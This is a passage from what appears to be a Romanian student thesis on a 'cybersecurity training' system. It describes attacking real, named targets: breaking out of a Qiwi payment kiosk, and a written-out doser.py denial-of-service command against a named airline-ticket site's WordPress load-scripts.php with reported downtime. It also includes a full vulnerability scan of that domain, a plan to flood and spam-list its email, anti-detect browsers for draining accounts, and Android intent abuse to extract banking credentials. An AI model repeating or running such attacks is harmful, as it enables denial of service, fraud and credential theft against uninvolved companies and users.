procurarea diferitor lucruri de pe platformele FAANG ca e -gift, gift ș.a. Cum se poate de vazut sunt asa
chestii ca tipul de user agent, webGL proxy, ip care il simulează și multe altele, însă unicul minus la
aplicația dată fara SOCKS4/5 nu va lucra și dacă nu este plătită licența lunară conform fig 3.8

Figura 3.8 – Lucrul cu sphere și diferite identități pentru a exfiltra date din accounturi

34
– block russian input permite website sa acceseze limba și sa vadă dacă este rusă
– user agent afisează orice tip de browser si el se alege singur in dependența de cookies
– WebRTC permiterea de a vedea ip real chiar daca este vpn sau socks
Diagrama de decompozoție DFD –procesarea datelor.

Figura 3.8 – Procesarea Datelor pentru crearea unui raport de vulnerabilitate

35
3 Descrierea comportamentală a sistemului .
Sistemul este de genul unei platforme de instruire în securitatea cibernetică care are scopul de a
proteja datele și integritatea personala a utilizatorilor mediului virtual de toate atacurile cibenetice,
plus la toate cele menționate mai are și scopul de a oferi informație ș i a învăța cum de găsit
vulnerabilitățile în cele 3 părti ale mediul online, ele fiind partea software,hardware și cea de web
aplicații, însă cel mare rol va juca sistemele de anonimizare și confidențializare a acțiunilor petrecute de
utilizatori .
Cea mai buna modalitate de a invăța ceva este de practica ce ai învățat – anume pe acesta se va
baza sistemul dat . Marea majoritate din utilizatori nu au nici o tangența cu domeniul IT ne mai vorbind
de securitate din cauza aceasta cam toți utilizatorii o să înce apă de la noțiuni introducetive și
comportamenul în mediul web. La moment internetul este o multitudine de sisteme care sunt legate între
ele și trimit diferite mesaje în direcții necunoscute din motivul că toate sunt logice și nu reale,multe din
sistemel e contemporane primesc diferite mesaje și fiecare unitate aparte decide singură ce să facă cu
mesajele și cum să răspundă la ele ,în general prin mesaje are loc comunicarea în mediul online ,numai
că nu sunt tipurile cunoscute nouă de mesaje similare pe care le scrim la cei apropiați, ele mai mult
seamănă cu comunicarea prin codul morse.
Sistemul va prezenta cum lucrează genul de servicii FAANG, ca exemplu dacă luăm
google.com acest resurs web de care se folosesc miliarde de oameni, sistemul va prezen ta la un nivel
abstractizat cum lucrează resursul d at prin intermediul browserului, deobicei lucrul dat se face prin
extragerii de către browserul utilizatorului numelui sitelui în cazul nostru este google.com, apoi
calculatorul se adresează către alt cal culator știind adresa logică al acelui calculator prin serviciul DNS(
Domain Name Service). După care catoruculatorul încearcă să stabileasca o conexiune intre el și
calculculatorul din california pentru a primi răspuns înapoi cea mai utlizabilă interfață unde este o bară
și deasupra ei scrie google, asta doar în cazul în care conexiunea este creată cu succes și deobicei o să
primim ceva similar :
GET / HTTP/1.1
Host: www.google.com
Connection: keep -alive
Accept: application/ html, */*
Pe lîngă toate acestea vor fi prezentate îndrumare pentru gasirea diferitor tipuri de vulnerabilități
pentru ca utilizatorii să poată să își protejeze singuri resursele web pe care le accesează.

36
4 Realizarea sistemului
La realizarea sistemului au fost folosite diferite instrumente necesare la executarea și realizarea
sistemului informațional de tipul ceator de exploituri, combinator de exploituri și compilator de
exploituri pentru diferite medii vulner abilități și medii de utilizare.
Mare majoritate a aplicațiilor utilizate pentru elaborarea acestui sistem sunt elaborate pe limbaje
de nivel jos (C,C++,Python și shell), insă mai mult predomina limbajul Py și C, însă cel mai fregvent
utilizat Metasploit este scris cu ajutorul limbajulu i Ruby on Rails.
Sistemul fiind compus din o multime de testuri de securitate care utilizează metode de penetrare
în sistemele informaționale utilizînd o multitudine de vulnerabilități existente despre care comunitatea
existentă nici nu bănuiește despre asa metode de penetrare care permit expulzarea datelor din orice
device cît de securizat nu ar fi acel sistem . La momentul actual 80% din sistemele existente au fost
compromise din motivul goanei dupa resursele financiare care sunt echivalate cu bunurile materiale și
din acest motiv multe companii nici nu au grija foarte mare de datele personale ale companiei și a
utilizatorilor serviciilor a acestor companii. Dacă luam ca exemplu site https//utm.md el este foarte
vulnerabil la 9/10 vulnerabilități TOP 10 OWASP , astfel reise ca Universitatea Tehnica exploatează
studenții în scopuri financiare și deloc nu protejează datele noastre personale care dacă ajung în public
vor fi la fel exploatate in scopurile de obtinere a creditelor personalizate și in scopul excrocheriilor
bancare acestea fiind cele mai simple metode de utilizare a datelor noastre personale.Pentru gasi
vulnerabilitățile în orice resurs web cel mai simplu este de a face un scan cu orice tool open -source care
sunt plasata pe github sau sourcefourge sau alte site web ,ori putem să creem propriul soft care folosește
aplicații deja existente ,însă care cuprind un funcțional mic ( ssl/tls scan)sau ceva similar care are doar
scopul de a evidenția un spectru uzat de vulnerabilități ca exemplu CMS
(wordpress,drupal,joomla,s .).Un exemplu bun de vulnerabilitate pe terminalele qiwi era liberul acces la
toate mapele din sistema de operare windows care este amplasată pe aceste terminale

Figura 4.1 – Exemplu unui terminal Qiwi cu aplicație vulnerabilă
Principalul factor care foarte tare mi a placut ca vulnerabilitatea găsită permitea liber scoaterea banilor
din aceste terminale și acest lucru deloc nu poate fi protejat prin lăcată care este pe poză,
vulnerabilitatea costa in faptul în cazul cînd este mult ținut pe ecranul din poză și peste o perioadă apare

37
o fereastră windows foarte mică care poate fi modificată marimea ei prin cea de a 2 mînă prin diferite
miscări sus,jos,dreapta,stînga după care este este posibil de accesat fișierele și mapele din sitema de
operare windows

Figura 4.2 – Accesul applicației vulnerabile și intrarea in mapa home
Cum este posibil de vazut pe poza de mai sus liber era posibil de accesat orice fișier de pe
terminal qiwi și liber de rulat orice proces. În cazul dat a fost rulat procesul unei joci bomber unde se
poate liber de jucat. Procesul dat nu va fi omorît pînă la mometul cind însăși utilizatorul nu va face
click pe butonul X
În general pe astfel de terminale este posibil de insatalat orice applicație de genul executabil sau
interpretabil și de avut acces în continuu la aceste terminale acest lucru este garantat de lipsa sistemelor
de securitate. Astefel se putea de instalat un ransomwere sau miner pentru criptovaluta , deja depinde de
imaginația fiecarui exploatator în parte
Cum este pos ibil de observat aici este reprezentată imaginea de mai sus în format mai clar, unde
este posibil de vazut unele fisiere și că sistema de operare este windows 7 pe un numar debiți 32/86 din
motiv că asa sisteme nu necesita multă memorie operativa și proce sări la nive l hardware
În general există o mulțime de metode pentru a sparge orișicare ATM(terminal) în scopuri
diferite începînd de la exfiltrare bani pînă la infiltrare de virusi sau mineri doar în un singur teminal c a
mai apoi serverul principal să fie infectat, ca urmare creind posibilitate de a face orice din serverele
bancilor sau al altor companii de a folosi datele lor în scopuri de tipul autoidentificare pe piața neagră
demonstrînd că persoana X sau grupul Z ara capacități de a sparge servere real e sau de a distruge
compani i și de pune bețe în roate la alte companii(eliminare de concurenți)

38

Figura 4.3 – Exemplu real de exploatare și acces a fisierelor de pe ATM
Deja în etapa finală de lucru cu acest aparat am lasat o urma cibernetică intenționa t care va
prezenta că aceste aparate pot fi liber sparse și ca unul din ele a fost spars de mine (penetrat)

Figura 4.4 –Exemplu de urma cibernetică lăsată prin intermediul peint
Urma cibernetică constă în faptul înscrierii pe ecran a sitelui meu in locul celui nativ cu
multitudine a de icons pe ecranul de front. Acest bug a fost reportat către platforma HackerOne (site
oficial https ://hackerone.com ) cea mai mare platformă de reportare a bugurilor gasite și la fel a
vulnerabilităților din diferite companii de genul FAANG ș.a. După deja această plaformă se ocupă cu
testarea și reportarea către proprietarul resursului, apoi dacă totul este ok primești un răspuns. În cazul
dat răspunsul a fost următorul :

39

Figura 4.5 – Raspunsul venit de la compania Qiwi pentru bug report
Cum este posibil aici la fel este marcketing curat, de ce spun asa din motivul ca companiile nici
o dat ă, mai drept spus nu au de gînd să achite pentru orice bug gasit sau vulnerabilitate a aparatelor sau
aplicațiilor pe care le promovează. Astfel reiese că tot ce se spunea și toate zvonurile legatede acest
trend este mai mult ficțiune decît adevăr. Acest lucru este facut special, din motivul ca companiile să nu
aibă pierderi mari în cazul cind se găseste un exploit ZERO DAY și este vîndut pe diferite forumuri cu
sume impresionabile, în urma utilizării acestui exploit se poate de expulzat din companie sau din
utilizatorii serviciilor prestate de aceste companii.
O altă problemă în ziua de azi este versionare, cu alte cuvinte orice aplicație creste în volum și
funcțional, însă unica problemă la chestia dată este o multitudinea de vulnerabilități care apar din
motivul cresterii funcționalului mai ales acest lucru poate fi vazut pe CMS wordpress ca exemplu poate
fi demonstrat urmatoarea vulnerabilitate
Cererea care a fost executată pentru ca site sa afiseze astfel de resultat este expusă în punctul 1 în
anex ă
Vulnerabilitatea dată permite cu ajutorul fișierului load -scripts de facut multe cereri la acest
script php fară acces de admin la pagina de incarcare a modulelor wordpress și a diferitor pagini pe
hostul unde stă webserviciul (în cazul dat este un servi ciu de vînzari a biletelor de zbor cu avionul în
orice colț a lumii :
Python doser.py 'https://www.asaptickets.com/wp -admin/load -scripts.php?c=1&load%5B%5D=

40
Flagul –g și &ver=4.9' -t 9999 restul expresiei este un nr de receri acest lucru permite de a face
doss pe această platformă ca rezultat vezi figura 4.6 :

Figura 4 .7- Outputul în urma atacului Ddos asupra unei infrastructuri a companiei de zboruri
Vulnerablitatea dată supraîncarcă resursele fizice , nu canalul de rețea ceia ce a permis să ca
site să nu poată să încarce normal pagina și să imi afișeze pagina dată cu codul 404 page is Not
Available, Acest lucru poate fi redat prin imaginea de jos efectuată de check -host.net conform figura 4.8
.

Figura 4.8 – Starea întîi Web Resursului în urma atacului DDos afișată de check -host.net.
La momentul actual există o mulțime de manuale in acces semi liber care au exemple reale de
atacuri aspura a diferitor companii web re surselor de tipul unow web site și multe altele vezi figura 4.9 .

41

Figura 4.9 – Starea a doua Web Resursului în urma atacului DDos afișată de check -host.net.
Dacă de urmatit minuțios putem vedea că jumate din cele 50 de hosturi care sunt amplasate în
toata lumea (25 de hosturi sunt cu codul 503) față de imaginea de mai sus unde statut ul este 403 , Acest
lucru redă faptul resursul web pînă a afișa pagina cu codul 404 a trecut cel puțin prin 2 etape în timpul
ce a fost atacat cu multitudinea de cereri .
Pentru a efectua asa tip de atacuri mai întîi este necesar de facut un scan asupra resursului cu
domenul asaptickets.com. Acest scan ca și orice scan evidențiază to ate tipurile de vulnerabilități :
[● < 30s] Deploying 1/80 | DMitry – Recoltează pasiv e -mailurile din
domeniu…Completed in 9s
Vulnerability Threat Level
low Email Adrese descoperite cu DMitry.
Definirea vulnerabilităților
Șansele sunt foarte puțin de a compromite o țintă cu adresele de e -mail. Cu toate acestea,
atacatorii folosesc acest lucru ca date de sprijin pentru a aduna informații în jurul țintei. Un atacator
poate folosi numele de utilizator de pe adresa de e -mail și poate efectua atacuri de forță brută pe
serverele de e -mail nu numai, dar și pe alte panouri legitime precum SSH, CMS, etc, cu o parolă,
deoarece au un nume legitim. Cu toate acestea, este o împușcare în scenariul întunecat, atacatorul poate
avea sau nu succes în funcție de nivelu l de interes
Remediera vulnerabilității
Deoarece șansele de exploatare sunt scăzute, nu este necesar să se ia măsuri. Remedierea
perfectă ar fi alegerea diferitelor nume de utilizator pentru diferite servicii va fi mai atent.
[● < 30s] Deploying 2/80 | N map – Verificări pentru serviciul SNMP …Completed in
4s
Vulnerability Threat Level

42
medium SNMP Service Detect at.
Definirea vulnerabilităților
Hackerii vor putea citi șirurile comunității prin intermediul serviciului și vor enumera o
informație destul de mare din țintă. De asemenea, există mai multe vulnerabilități de execuție a codului
de la distanță și refuz de servicii legate de serviciile SNMP.
Remediera vulnerabilității
Utilizați un firewall pentru a bloca porturile din lumea exterioară. Articolul următor oferă o
perspectivă largă asupra blocării serviciului SNMP. https://www.techrepublic.com/article/lock -it-down –
dont-allow -snmp -to-compromise -network -security/
[● < 15s] Deploying 3/80 | Nmap – Verifică ORACLE DB…Completed in 3s
[● < 35s] Deployin g 4/80 | Nmap [LOGJAM] – Verifică vulnerabilitatea
LOGJAM….Completed in 15s
[● < 3m] Deploying 5/80 | WhatWeb – Verificări pentru antetul de protecție X –
XSS…Completed in 15s
Vulnerability Threat Level
medium X -XSS Protection
Definirea vulnerabilită ților
Deoarece ținta lipsește acest antet, browserele mai vechi vor fi predispuse la atacurile XSS
reflectate.
Remediera vulnerabilității
Browser -urile moderne nu se confruntă cu probleme cu această vulnerabilitate (anteturi care
lipsesc). Cu toate acestea, browserele mai vechi li se recomandă să fie actualizate.
[● < 15s] Deploying 6/80 | Host – Verifică existența unei adrese IPV6 ….Completed
in 2s
Vulnerability Threat Level
info Nu are o adresă IPv6. Este bine să ai unul.
Definirea vulnerabilit ății
Nu este o vulnerabilitate, ci doar o alertă informațională. Gazda nu are suport IPv6. IPv6 oferă
mai multă securitate pe măsură ce IPSec (responsabil pentru CIA – Confidențialitate, Integritate și
Disponibilitate) este încorporat în acest model. Deci este bine să aveți suport IPv6. Vulnerability
Remediation
Se recomandă implementarea IPv6. Mai multe informații despre cum să implementați IPv6
puteți găsi din această resursă. https://www.cisco.com/c/en/us/solutions/collateral/enterprise/cisco -on-
cisco/I Pv6-Implementation_CS.html
[● < 35m] Deploying 7/80 | DirB – Brutează ținta pentru Directoare
deschise ….Completed in 14m 26s
[● < 35s] Deploying 8/80 | Nikto – Verificări pentru Apache Se așteaptă antetul
XSS….Completed in 1m 8s

43
[● < 9m] Deploying 9/80 | Uniscan – Stress Tests Dome n….Completed in 1m 39s
[● < 15s] Deploying 10/80 | Golismero – Are o amprentă pe Domeniu ….Completed in
12s
[● < 35s] Deploying 11/80 | Nikto – Brute Subdomain….Completed in 50s
[● < 5m] Deploying 12/80 | Uniscan – Brutes Directoare pe domeniu ….Completed in
42m 34s
Vulnerability Threat Level
medium Directoare deschise găsite cu Uniscan.
Definirea vulnerabilităților
Atacatorii pot găsi o cantitate considerabilă de informații din aceste directoare. Există chiar
șanse ca atacatorii să poată avea acces la informații critice din aceste directoare.
Remediera vulnerabilității
Se recomandă blocarea sau restricționarea accesului la aceste directoare, dacă nu este necesar.
[● < 4m] Deploying 14/80 | LBD – Verificări pentru balanțele de încărcare DNS /
HTTP….Completed in 3m 42s
Vulnerability Threat Level
low No DNS/HTTP bazate pe echilibrele de încărcare găsite
Definirea vulnerabilităților
Acest lucru nu are nicio legătură cu riscurile de securitate, cu toate că atacatorii pot folosi
această indisponibilitate a echilibrelor de încărcare ca avantaj pentru a folosi un atac de refuz al
serviciilor asupra anumitor servicii sau asupra întregii aplicații în sine.
Remediera vulnerabil ității
Balanții de încărcare sunt foarte încurajați pentru orice aplicație web. Îmbunătățesc timpii de
performanță, precum și disponibilitatea datelor în perioadele de întrerupere a serverului. Pentru a afla
mai multe informații despre echilibrele de încă rcare și configurare, verificați această resursă.
https://www.digitalocean.com/community/tutorials/what -is-load-balancing
[● < 30s] Deploying 15/80 | Golismero Zone Transfer – Încercări de transfer de
zonă….Completed in 21s
[● < 5m] Deploying 16/80 | Wap iti – Verificări pentru SQLi, RCE, XSS și alte
vulnerabilități …Completed in 1s
[● < 30s] Deploying 17/80 | SSLyze – Verificări pentru compresia ZLib
Deflate….Completed in 6s
[● < 40s] Deploying 18/80 | Nmap – Verificări pentru IIS WebDAV …Completed in 4s
[● < 2m] Deploying 19/80 | Uniscan – Brute pentru numele de fișiere pe
domeniu….Completed in 9m 7s
Vulnerability Threat Level
medium Deschideți fișierele găsite cu Uniscan.
Definirea vulnerabilităților

44
Atacatorii pot avea o cantitate considerabi lă de informații despre împrumuturi. Există clarități
care pot ataca accesorii pentru a putea avea acces la informațiile critice despre utilizarea fișierelor.
Remediera vulnerabilității
Se recomandă blocarea sau restricționarea accesului la aceste fișiere , dacă nu este necesar.
[● < 40s] Deploying 20/80 | Golismero – Verifică numai pentru vulnerabilitate
cardiacă ….Completed in 19s
[● < 35s] Deploying 21/80 | Nikto – Verificări pentru căi injectabile ….Completed
in 1m 15s
[● < 35s] Deploying 22/80 | Nmap [POODLE] – Verifică numai pentru vulnerabilitatea
Poodle….Completed in 4s
[● < 35s] Deploying 23/80 | Nikto – Verificări pentru probleme de
server….Completed in 1m 15s
[● < 40s] Deploying 24/80 | Golismero – BruteForces for certain directories on the
Domain….Completed in 2s
[● < 9m] Deploying 26/80 | Uniscan – Verificări pentru XSS, SQLi, BSQLi și alte
verificări ….Completed in 1h 12m 53s
Vulnerability Threat Level
high Uniscan detected possible XSS, SQLi, BSQLi.
Definirea vulnerabilităților
Hackerii vor putea fura date din backend și, de asemenea, se pot autentifica
pe site-ul web și pot face ca orice utilizator, deoarece au un control total asupra
backend-ului. Ele pot șterge chiar întreaga bază de date. Atacan ții pot, de
asemenea, să fure informațiile privind cookie -urile unui utilizator autentificat și
pot chiar redirecționa ținta către orice adresă rău intenționată sau pot elimina
total aplicația.
Remediera vulnerabilității
Validarea corectă a intrării trebu ie făcută înainte de interogarea directă a
informațiilor din baza de date. Un dezvoltator ar trebui să -și amintească să nu
aibă încredere în intrarea utilizatorului final. Urmând o metodologie sigură de
codare atacuri precum SQLi, XSS și BSQLi. Următoarele ghiduri de resurse cu privire
la modul de implementare a metodologiei sigure de codare pentru dezvoltarea
aplicațiilor.
https://wiki.sei.cmu.edu/confluence/display/seccode/Top+10+Secure+Coding+Practices
[● < 20s] Deploying 27/80 | Nmap [STUXNET] – Verifică dacă gazda este afectată de
STUXNET Worm ….Completed in 4s
[● < 45s] Deploying 28/80 | Golismero – SQLMap [Retrieves only the DB
Banner]…Completed in 2s
[● < 45s] Deploying 29/80 | DNSEnum – Încercări de transfer de zonă ….Completed in
27m 56s
[● < 30s] Deploying 30/80 | Fierce – Încercări de transfer de zonă [Fără forțare
brută]…Completed in 9s
[● < 75m] Deploying 31/80 | Fierce Subdomains Bruter – Brute Forces Discovery
Subdomain ….Completed in 19m
Vulnerability Threat Level

45
medium Subdomenii găsite cu Fierce.
Definirea vulnerabilităților
Atacatorii pot aduna mai multe informații din subdomenii referitoare la domeniul părinte.
Atacatorii pot găsi chiar și alte servicii din subdomenii și să încerce să învețe arhitectura țintei. Există
chiar șan se ca atacatorul să găsească vulnerabilități pe măsură ce suprafața atacului devine mai mare cu
mai multe subdomenii descoperite.
Remediera vulnerabilității
Uneori este înțelept să blochezi subdomenii precum dezvoltarea, punând în scenă lumea
exterioară, deoarece oferă mai multe informații atacatorului despre stiva tehnologică. Practicile de
denumire complexe ajută, de asemenea, la reducerea suprafeței atacului, întrucât atacatorii găsesc
dificultăți în efectuarea de subsecțiuni prin intermediul dicționare lor și listelor de cuvinte.
[● < 35s] Deploying 32/80 | DNSWalk – Încercări de transfer de zonă ….Completed in
6s
[● < 20s] Deploying 33/80 | Nmap [XSS Filter Check] – Verifică dacă antetul de
protecție XSS este prezent ….Completed in 13s
[● < 35s] Deplo ying 34/80 | Nikto – Verifică dacă Serverul este
depășit….Completed in 2m 7s
[● < 2m] Deploying 35/80 | Nmap – Fast Scan [Only Few Port Checks]…Completed in
11s
Vulnerability Threat Level
low Unele porturi sunt deschise. Efectuați o scanare completă manual.
Definirea vulnerabilităților
Porturile deschise oferă atacatorilor un indiciu de a exploata serviciile. Atacatorii încearcă să
extragă informațiile despre banner prin porturi și să înțeleagă ce tip de serviciu rulează gazda
Remediera vulnerabilității
Se recomandă închiderea porturilor serviciilor neutilizate și utilizarea unui firewall pentru a filtra
porturile acolo unde este necesar. Această resursă poate oferi mai multe informații.
https://security.stackexchange.com/a/145781/6137
[● < 30s] Deploying 36/80 | ASP.Net Configurare greșită – Checks for ASP.Net
Misconfiguration….Completed in 13s
[● < 35s] Deploying 37/80 | Nikto – Verifică orice fișier interesant pe
domeniu….Completed in 3m 58s
[● < 35s] Deploying 38/80 | Nikto – Enumerează directoare CGI ….Completed in 2m
14s
[● < 45m] Deploying 39/80 | Nmap [Slowloris DoS] – Verificări pentru refuzul
serviciului Slowloris Vulnerability….Completed in 1h 15s
[● < 8m] Deploying 40/80 | Uniscan – Verificări pentru LFI, RFI și
RCE….Completed in 24m 52s
[● < 30s] Deploying 41/80 | Nmap [Heartbleed] – Verificări pentru Heartbleed
Vulnerability….Completed in 21s

46
[● < 30s] Deploying 42/80 | SSLyze – Verificări pentru sprijinul reluării sesiunii
cu [Session IDs/TLS Tickets]….Completed in 14s
[● < 25s] Deploying 43/80 | SSLyze – Verificări pentru asistența securizată pentru
renegociere și renegocierea clientului. …Completed in 13s
[● < 35s] Deploying 44/80 | Nikto – Verifică opțiunile HTTP pe domeniu ….Completed
in 2m 10s
[● < 30s] De ploying 45/80 | Verificări pentru ASP.net Elmah Logger …Completed in
12s
[● < 35s] Deploying 46/80 | Nikto – Verificări privind scurgerea IP
internă….Completed in 1m 58s
[● < 15s] Deploying 47/80 | Nmap [TELNET] – Verifică dacă serviciul TELNET
rulează….Completed in 4s
[● < 15s] Deploying 48/80 | Nmap [FTP] – Verifică dacă serviciul FTP
rulează….Completed in 3s
[● < 20s] Deploying 49/80 | Verificări pentru serviciul SMB сu UDP…Completed in
4s
[● < 45s] Deploying 50/80 | Golismero – BruteForces pentru anumite fișiere din
Domeniu….Completed in 28m 58s
[● < 30s] Deploying 51/80 | Joomla Checker – Verificați Joomla
Installation….Completed in 10s
[● < 40s] Deploying 52/80 | Uniscan – Verificați robots.txt &
sitemap.xml…Completed in 47s
Vulnerability Threat Level
info robots.txt/sitemap.xml găsite. Verificați orice fișier pentru informații.
Definirea vulnerabilităților
Uneori, robots.txt sau sitemap.xml pot conține reguli precum anumite link -uri care nu ar trebui
să fie accesate / ind exate de crawler și motoarele de căutare. Motoarele de căutare pot sări aceste link –
uri, dar atacatorii vor putea să -l acceseze direct.
Remediera vulnerabilității
Este o practică bună să nu includeți legături sensibile în roboți sau fișiere de sitemap.
[● < 4m] Deploying 53/80 | XSSer – Verifică Cross-Site Scripting [XSS]
Attacks….Completed in 2m 53s
[● < 35s] Deploying 54/80 | Nikto – Verifică MS10-070 Vulnerabilitate ….Completed
in 2m
[● < 30s] Deploying 55/80 | Nmap [FREAK] – Verifică FREAK
Vulnerab ilitate….Completed in 1m 7s
Vulnerability Threat Level
high Vulnerabilitate FREAK detectată.
Definirea vulnerabilităților

47
Cu această vulnerabilitate, atacatorul va putea efectua un atac MiTM și compromitând astfel
factorul de confidențialitate.
Remediera vulnerabilității
Modernizarea OpenSSL la cea mai recentă versiune va atenua această problemă. Versiunile
anterioare datei 1.1.0 sunt predispuse la această vulnerabilitate. Mai multe informații pot fi găsite în
această resursă . https://bobcares.c om/blog/how -to-fix-sweet32 -birthday -attacks -vulnerability -cve-2016 –
2183/
[● < 20s] Deploying 56/80 | DNSRecon – Încercări de transferuri cu mai multe zone
pe servere de nume ….Completed in 48s
[● < 30s] Deploying 57/80 | WordPress Checker – Verificări pen tru instalarea
WordPress ….Completed in 9s
[● < 4m] Deploying 58/80 | Golismero Nikto Scans – Utilizează Nikto Plugin pentru
a detecta vulnerabilitățile ….Completed in 1m 50s
[● < 30s] Deploying 59/80 | Drupal Checker – Verifică Drupal
Installation….C ompleted in 9s
[● < 25s] Deploying 60/80 | SSLyze – Verifică OCSP Stapling….Completed in 1s
[● < 15s] Deploying 61/80 | Nmap – Verifică MySQL DB…Completed in 4s
[● < 45s] Deploying 62/80 | Golismero – Verifică dacă domeniul este spoofed or
hacked….Completed in 2s
[● < 20s] Deploying 64/80 | Verificări pentru serviciul SMB prin TCP …Completed
in 4s
[● < 45s] Deploying 65/80 | Wafw00f – Verificări pentru firewall -uri de
aplicare ….Completed in 11s
Vulnerability Threat Level
medium Nu a fost detectat firewall -ul pentru aplicații web
Definirea vulnerabilităților
Fără un firewall de aplicație web, un atacator poate încerca să injecteze diferite modele de atac
fie manual, fie folosind scanere automate. Un scaner automat poate trimite hoarde de vectori de atac și
tipare pentru validarea unui atac, există și șanse ca aplicația să obțină DoS`ed (Negarea serviciului)
Remediera vulnerabilității
Aplicațiile Web Firewall -urile oferă o protecție deosebită împotriva atacurilor web comune, cum
ar fi XSS, SQLi, etc. Acestea oferă, de asemenea, o linie de apărare suplimentară infrastructurii de
securitate. Această resursă conține informații despre firewall -urile aplicațiilor web care ar putea fi
potrivite pentru aplicația dvs. https://www.gartner.com/review s/market/web -application -firewall
[● < 30m] Deploy ing 66/80 | Golismero Subdomain Brute – Brute Forces
Subdomain….Completed in 51m 31s
Vulnerability Threat Level
medium Subdomenii găsite cu Golismero.
Definirea vulnerabilităților

48
Atacatorii pot aduna mai multe informații din subdomenii referitoare la domeniul părinte.
Atacatorii pot găsi chiar și alte servicii din subdomenii și să încerce să învețe arhitectura țintei. Există
chiar șanse ca atacatorul să găsească vulnerabilități pe măsură ce suprafața atacului devine mai mare cu
mai multe subdomenii descoperite.
Remediera vulnerabilității
Uneori este înțelept să blochezi subdomenii precum dezvoltarea, punând în scenă lumea
exterioară, deoarece oferă mai multe informații atacatorului despre stiva tehnologică. Practicile de
denumire complexe ajută, de asemenea, la reducerea suprafeței ataculu i, întrucât atacatorii găsesc
dificultăți în efectuarea de subsecțiuni prin intermediul dicționarelor și listelor de cuvinte.
[● < 35s] Deploying 67/80 | Nikto – Verificări pentru HTTP PUT DEL ….Completed in
1m 58s
[● < 30s] Deploying 68/80 | WebDAV – Verifică dacă WEBDAV este activat în
directorul Acasă ….Completed in 9s
[● < 35s] Deploying 69/80 | Nikto – Verificări pentru bug Shellshock ….Completed
in 14m 31s
[● < 35s] Deploying 70/80 | DMitry – Recoltează pasiv Subdomini din
Domain….Completed in 4s
[● < 45s] Deploying 71/80 | Golismero SSL Scans – Efectuează scanări legate de
SSL….Completed in 1m 54s
Vulnerability Threat Level
medium S-au găsit vulnerabilități legate de SSL Golismero.
Definirea vulnerabilităților
Vulnerabilitățile legate de SSL încalcă factorul de confidențialitate. Un atacator poate efectua un
atac MiTM, poate interpreta și ascunde comunicarea.
Remediera vulnerabilității
Implementarea corectă și versiunea actualizată a bibliotecilor SSL și TLS sunt foarte critice când
vine vorba de blocarea vulnerabilităților legate de SSL.
[● < 35s] Deploying 72/80 | Nmap [OpenSSL CCS Injection] – Verifică numai pentru
injectarea CCS. …Completed in 4s
[● < 15s] Deploying 73/80 | Nmap – Verificări Remote Desktop UDP…Completed in 3s

high RDP Server detectat peste UDP.
Vulnerability Definition
Attackers may launch remote exploits to either crash the service or tools like ncrack to try brute –
forcing the password on the target.
Vulnerability Remediation
Se recomandă să blocheze serviciul în lumea exterioară și să facă accesibil serviciul doar printr –
un set de IP -uri permise doar într -adevăr necesar. Următoarea resursă oferă informații despre riscuri,

49
precum și pașii pentru a bloca serviciul. https://www.p erspectiverisk.com/remote -desktop -service –
vulnerabilities/
[● < 35s] Deploying 74/80 | Nikto – Verifică anteturile domeniului ….Completed in
2m 30s
Vulnerability Threat Level
medium Unele anteturi vulnerabile expuse.
Definirea vulnerabilităților
Ataca torii încearcă să afle mai multe despre țintă din cantitatea de informații expuse în antet. Un
atacator poate ști ce tip de tehnologie stivă aplică o aplicație web și multe alte informații.
Remediera vulnerabilității
Prinderea bannerului ar trebui să fie restricționată și accesul la servicii din exterior ar trebui să
fie minim.
[● < 15s] Deploying 75/80 | Nmap – Verificări Remote Desktop Service over
TCP…Completed in 4s
[● < 15s] Deploying 76/80 | Nmap – Verificări pentru MS-SQL Server DB…Completed
in 4s
[● < 30m] Deployi ng 77/80 | DNSMap – Brut Subdomine ….Completed in 20m 18s
Vulnerability Threat Level
medium Subdomenii găsite cu DNSMap .
Definirea vulnerabilităților
Atacatorii pot aduna mai multe informații din subdomenii referitoare la domeniul părinte.
Atacatorii pot găsi chiar și alte servicii din subdomenii și să încerce să învețe arhitectura țintei. Există
chiar șanse ca atacatorul să găsească vulnerabilități pe măsură ce suprafața atacului devine mai mare cu
mai multe subdomenii descoperite.
Remediera vulnerabilității
Uneori este înțelept să blochezi subdomenii precum dezvoltarea, punând în scenă lumea
exterioară, deoarece oferă mai multe informații atacatorului despre stiva tehnologică. Practicile de
denumire complexe ajută, de asemenea, la reducerea suprafeței atacului, întrucât atacatorii găsesc
dificultăți în efectuarea de subsecțiuni prin intermediul dicționarelor și listelor de cuvinte.
[● < 40s] Deploying 78/80 | SSLyze – Checks only for Heartbleed
Vulnerability….Completed in 15s
[● < 25s] Deploying 79/80 | WHOis – Verifică informațiile de contact ale
administratorului ….Completed in 3s
Vulnerability Threat Level
info Whois Informații disponibile public.
Definirea vulnerabilităților
Adresa de e -mail a administratorului și alte informații (adresă, telefon etc.) sunt disponibile
public. Un atacator poate utiliza aceste informații pentru a susține un atac. Aceasta nu poate fi utilizată

50
pentru a efectua un atac direct, deoarece aceasta nu este o vulnerabilitate. Cu toate acestea, un atacator
folosește aceste date pentru a crea informații despre țintă.
Remediera vulnerabilității
Unii administratori ar fi făcut în mod intenționat aceste informații publice, în acest caz putând fi
ignorate. D acă nu, se recomandă mascarea informațiilor. Această resursă oferă informații despre această
soluție. http://www.name.com/blog/how -tos/tutorial -2/2013/06/protect -your-personal -information -with-
whois -privacy
Ca urmare a acestui scan era posibil de facut flood la email, permitea de introdus domenul în
TopForumsSpam și de îngreunat lucrul personalului din cauza floodului făcut, ceia ce putea duce la
pierderea cli nților și a banilor, utimul factor aici este intrarea domenului in lista sitelor care fac spam,
acest lucru va duce la faptul că toate meilurile care vor fi trimise de pe acest domen automat vor intra în
lista de spam a tuturor c lienților care folosesc acest serviciu de procurare a biletelor. Astfel reiese
– clienții nu vor vedea mesajele noi de genul newsletter
– nu vor primi notificarile ca au procurat cu succes biletul
– nu vor putea comunica cu departamentul de vînzări și asistenț ă tehnica
Acest lucru va face ca sistemul dat să piardă milioane in valuta internațională și ca urmare va
cădea reitingul in google.com

Un alt caz de exploatare a datelor deja pentru device portative ca telefoanele mobile este
utilizarea intenturilor și activităților, prin intermediul cărora este posibil de extras date de genul
credențialele din aplicațiile mobile bancking
4.1 Exploatarea Activitățile și Intenturile
Pentru ca Activitatea să devină disponibilă sistemului, trebuie să fie declarată în fișierul
manifest. Pentru aceasta, elementul <activitate> este declarat ca un copil al elementului <aplicație>.
<manifest …..>
<application …….>
<activity ‘android:name=”.ExampleActivity” />
……
<application …….>
……
</manifest>

Fișierul manifest este fișierul AndroidManifest.xml situat în directorul rădăcin ă al aplicației, care
transfera informa ție despre sistem in sistemul în sistemul Android
